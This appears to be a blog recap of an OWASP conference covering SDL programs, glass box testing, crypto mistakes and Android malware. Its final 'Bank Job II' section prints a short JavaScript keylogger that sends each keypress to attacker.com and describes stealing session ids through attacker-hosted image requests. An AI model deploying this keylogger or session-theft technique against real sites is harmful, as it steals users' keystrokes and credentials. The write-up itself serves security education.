At the very end, as a sort of appendix, he did discuss ways to detect such vulnerabilities – both in blackbox pentests, and in Code reviews. it really just comes back to finding places where an application-layer DoS is possible, for any of the backend layers – such as a resource or code flow that is controlled by input (direct or indirect).

 

Building an Effective SDLC Program

This was a joint lecture, between Ofer Maor (CTO of Seeker Security, formerly CTO of E&Y’s Hacktics, also the chapter chairman), and Guy Bejerano, CSO of Liveperson. The two presented a case study of the process of implementing an SDL – security development lifecycle. They discussed to their own mutual experience of pulling the Liveperson development staff into SDL (Ofer’s team consulted to Liveperson on this).

One of the key challenges for Liveperson (and indeed, most SaaS providers) is providing a service – which should be secure, of course – in the cloud, and using cloud services. (This calls back to some of the challenges that Dr. Hadar referred to in his keynote). Amongst other issues, many of their high-security customers insisted on performing an external pentest on their service. On the other hand, Liveperson felt the impact of security bugs – friction, costs, reputation damage – but did not really bother to focus on the upside.

Their development started as a standard “Waterfall” process (Gladly, they didn’t eat the lunch of my own later talk, though there is some overlap…) This did present its own challenges, such as accuracy and repetitiveness of testing, and more.

They then decided to switch to an Agile lifecycle, but this created even more friction! (My talk later in the day focused on the difficulties of SDL specifically with Agile.) Ofer shared an anecdote regarding SDL-related friction: he performed pentest for one of the larger US retailers. Finding many instances of SQL Injection and over 40 other vulnerabilities, he was later told that the developers had to work overnight straight through the holiday season, just to fix what was only discovered at the end of the cycle, instead of much earlier.

Guy perceives “SDLC” as “vendor heaven” – with an overload of products, services, and more, you never know what you need, or when it’s enough, right?

They proposed a few key points to focus on, before laying out your SDL:

  • Define your requirements – focus on risk profile, including your customers’ risk requirements (e.g. PCI, HIPAA, etc.). Decide where you need to get to.
  • Select a framework – for a common language, e.g.Liveperson settled on OWASP’s taxonomy.
  • Who leads the program? For a very technical org (such as any software company), it can no longer be just the CSO, but you have to create ownership in the dev teams.

For example, the system owner needs to accept security as one of the operational requirements… and it then becomes his responsibility to deliver. Also, it’s best if you can make security leaders (or “champions”) out of the best programmers.

Security then becomes part of the quality requirement. It can start with QA, by getting them interested / involved in security – then QA can find security bugs, too.

  • Knowledge sharing: there were some changes in the process from what they originally intended. They started off with a mistake, but then realized that they must create awareness. It even came to the point that watercooler talk between programmers, was actually about sql injection.
  • Penetration testing strategy (manual/automatic, blackbox/whitebox, internal/external, etc)
  • Fitting tools to platform/process
  • Operational cycle – Key Performance Indicators (for the SDL), and reviewed by owners

Encouragingly, Guy affirmed that a second round of SDL implementation, with focus on these issues, was a lot more successful.

 

Glass Box Testing – Thinking Inside the Box

Omri Weisman, manager of the Security Research Group in IBM, gave an interesting talk about their research in new forms of automated testing. (Of course, count on IBM that this will eventually be rolled into a high-end product. Btw, one of the other sponsors of the conference, Seeker Security, also has a product in this field, though I have not personally experimented with it yet).

Previously, one of the main options for automated testing was Black Box – based on sending inputs to a closed system, and checking the outputs. One key drawback of this approach, is the difficulty in finding hidden logic – such as magic numbers, secret parameters, and other types. Another challenge for black box testing, are attacks that don’t really have noticeable results – as an example, consider SQL Injection that does not return data. While there are ways around this, such as blind injection or timing attacks, this is often complex and not trivial.

Another important drawback to blackbox testing, is that it is typically very difficult to trace a given issue, back to the line of code that needs to be fixed. Often a programmer, tasked with fixing a vulnerability found in BB, will have to drill down many layers of code, calling functions, configured classes, referenced modules, and pointless comments, until he finds the one single faulty line of code.

So what is GlassBox?

Omri used a very cute video to display this intuitively… Blackbox: sliding an envelope under a closed door, and getting another envelope in response. Glassbox is like sliding the envelope under the door – and then looking through the window, to see a gorilla preparing the response…. 🙂

Or, more succinctly:

Glass Box testing uses internal agents to guide application scanning

Using this direction, GB has a lot more information available – memory, structure, environment, source code, runtime configuration, actual network traffic, access to file-system, registry, database, and much more.

Glassbox offers the capability to do additional tests, that you couldn’t do with straight BB – such as verifying test coverage (an important facet in security assurance), finding hidden parameters and values, backdoors, attacks with no response, DoS, and even generating exploits directly according to the existing input validation.

GB further assists the testing process, by consolidating and correlating similar issues that can be traced back to the same source, thus removing duplicates. GB can also trace the results of the external pentest, back to the specific lines of code, and can also help remove false positives.

Thus, Glassbox testing could solve the black box challenges… and moreover, this would enable an automated PT tool to automatically detect e.g. all OWASP Top 10 issues (typically, BB tools can only discover half).

 

Agile + SDL – Concepts and Misconceptions

Next up was my own talk, together with Nir Bregman from HP, explaining the difficulty in combining an SDL (Security Development Lifecycle) process with Agile methodology – but I will save the content of that for its own post, where I’ll elaborate on the whole idea behind the talk.

Without delving into the content, I will say that I had a blast delivering the talk. After a short introduction to the terminology (for those unfamiliar), we structured the first half of the talk as an aggressive, back-and-forth (modeled after the “yo’ momma” contests of yore), with each of us presenting an ignorant view of the other’s methodology (I defended SDL, as a security pro, and showed great ignorance and pettiness wrt Agile, Nir respectfully displayed immaturity regarding all things security). The second half of the talk, of course, showed how to reconcile the resulting problems, and presented some possibilities of implementing SDL as part of an Agile workflow.

Before that, though, we had a great lunch – thanks to all the sponsors!

 

When Crypto Goes Wrong

Erez Metula (AppSec Labs) is well-known as a great speaker, and he always puts on a great show. This time, he did not disappoint. Though there was not much new meat in his talk, it was a great back-to-basics review of common mistakes that happen when programmers try to implement cryptographic functions. (Overall, I think this was probably the most important talk of the day, at least for the programmers that attended – and at the end of the day, isn’t the whole purpose of OWASP to help programmers implement secure code?).

  • Home grown algorithms
  • Outdated crypto (e.g. MD5, DES)
  • Bad encryption mode, e.g. AES with ECB instead of CBC.
  • Forgetting to verify certificates – e.g. from a rich client, when calling a backend web service, or even more commonly from mobile apps.
  • Not requiring HTTPS (Don’t forget about SSLstrip…)
  • Direct access to server-side crypto functions
  • Direct access to client-side crypto functions (ex: exposed ActiveX crypto)
  • Sending hash values over an insecure transport (such as this recent question)
  • Not using salts (and pepper)
  • Leaving the key with the encrypted secrets
  • Unprotected encryption keys
  • Same symmetric key for all clients
  • Same asymmetric keys for all deployments
  • Same keys, different encryption needs (or “Crypto is not a replacement for access control”)
  • Replaying password hashes
  • Replaying encrypted blocks
  • Combining (or correlating) unrelated encrypted blocks
  • Crypto-DoS – by causing the application to RSA sign large amounts of data

 

Hey, What’s your App doing on my (Smart)Phone?

Shay Zalalichin, CTO of Comsec Consulting (and btw, my former boss 🙂 ), discussed various mobile malware, focusing specifically on the Android platform. Just a note, this was the second out of three talks about mobile security (I missed Itzik Kotler’s talk on hacking mobile apps, but I heard it was great – he also presented results of research that Security Art performed on the most common apps in the iTunes store). This can be taken as a sign of OWASP’s acceptance in a wider role in Application Security, and no longer just Web Apps.

As an example, Shay displayed an Android app (from the Android Market), that simply displays a diamond – if you can’t afford a real diamond, you can’t afford this – but, secretly, the app accesses all the phone logs, outgoing calls, contacts, etc.

His message focused on the fact that today’s phones have a lot more functionality, connectivity – and assets. It’s a stretch to even call it a “phone”… Depending on your viewpoint, phones can provide something computers don’t have (user viewpoint); but they are also really pretty much a mobile computer, with access to the same assets as a regular computer (enterprise management viewpoint).

Whilst the mobile market is finally evolving (“year of the mobile” has been declared several years in a row, but now the stats actually back it up), mobile malware is also evolving. State-of-the-art mobile malware no longer focuses just on “sending premium SMS”, now malware is also actually attacking the mobile device, stored assets, and more. Btw, it is trivial getting malware into the Android market…

Shay explained the Android architecture, it’s security model (based on pieces from both Linux+Java), and Android permissions, based on a thick manifest – which is very much not fine-grained (e.g. an app can be granted “access internet”, but no way to limit that to a single site, and SameOriginPolicy does not apply). Shay also discussed some of the key components of the platform, such as “intents” – basically an IPC mechanism (for intra- and inter-app communication).

Some Android specific attacks: intent sniffing, intent spoofing / injection, insecure storage, privilege manipulation and bypass, and more.

Btw, as he mentioned, OWASP has it’s own mobile security project. Anyway, I don’t think that I will be getting an Android phone anytime soon… 😉

 

The Bank Job II

The final talk of the day was given by Adi Sharabani, Leader of the Rational’s Security Strategy and Architecture team at IBM, ran a very nice demo of a hacker’s (sic) experience.

1 . Know your target

  • Same Origin Policy (SOP), enforced by all common web browsers, prevents a page on a website from directly accessing any other website.
  • There are some ways to overcome SOP:
    • Site vulnerabilities: client side vulnerabilities, Man-in-the-Middle (MitM) – especially over unprotected Wi-Fi
    • Browser vulnerabilities, DNS vulnerabilities, Active MitM

2 . Executing the Attack

1. open URL

2. sleep

3. open `javascript:alert(1)`

But, what else can this vulnerability be used for? E.g. stealing a users session id for some random other site (after login).

E.g. using an external JavaScript file, to request an image on the attacker’s server with the session id in the URL – of course, the image itself is of no interest, however the attacker has already received the user’s session id.

  • Some challenges with the above attack scenario:
    • The victim is not yet authenticated, so stealing the session id would be pointless
    • This would be blocked by HTTPonly cookie attribute.
  • Adi presented a JavaScript based keylogger (in only a handful of lines of code!):

void sendData(char c){

   var img = document.createElement(“img”)

   img.src = ”http://attacker.com/” + c;

   document.body.append(img);

} document.body.onKeyPress = function(event) {sendData(key);}

(Hmm, as I am an IntelliSense cripple, please forgive my memory if there are any syntax errors…)

  • 2-factor authentication would still prevent this attack…
    • Instead, the attacker can embed the attack directly in the client JavaScript, and have no need to steal the session id itself. (Btw, in many cases, the 2-factor authentication is only applied on the authentication page – but further session access would be based on the session id alone…)
  • Based on the above vulnerability + keylogger, a malicious app could easily permanently poison any browser session running on the device! (Adi also showed a workaround for unload events, e.g. if the user closes the browser you don’t want to keep poisoning the session.)

Boom, there you have it – the attacker is now in total control of all browsing you do from your mobile phone…

What an encouraging note to end the day 😀

Filed under Community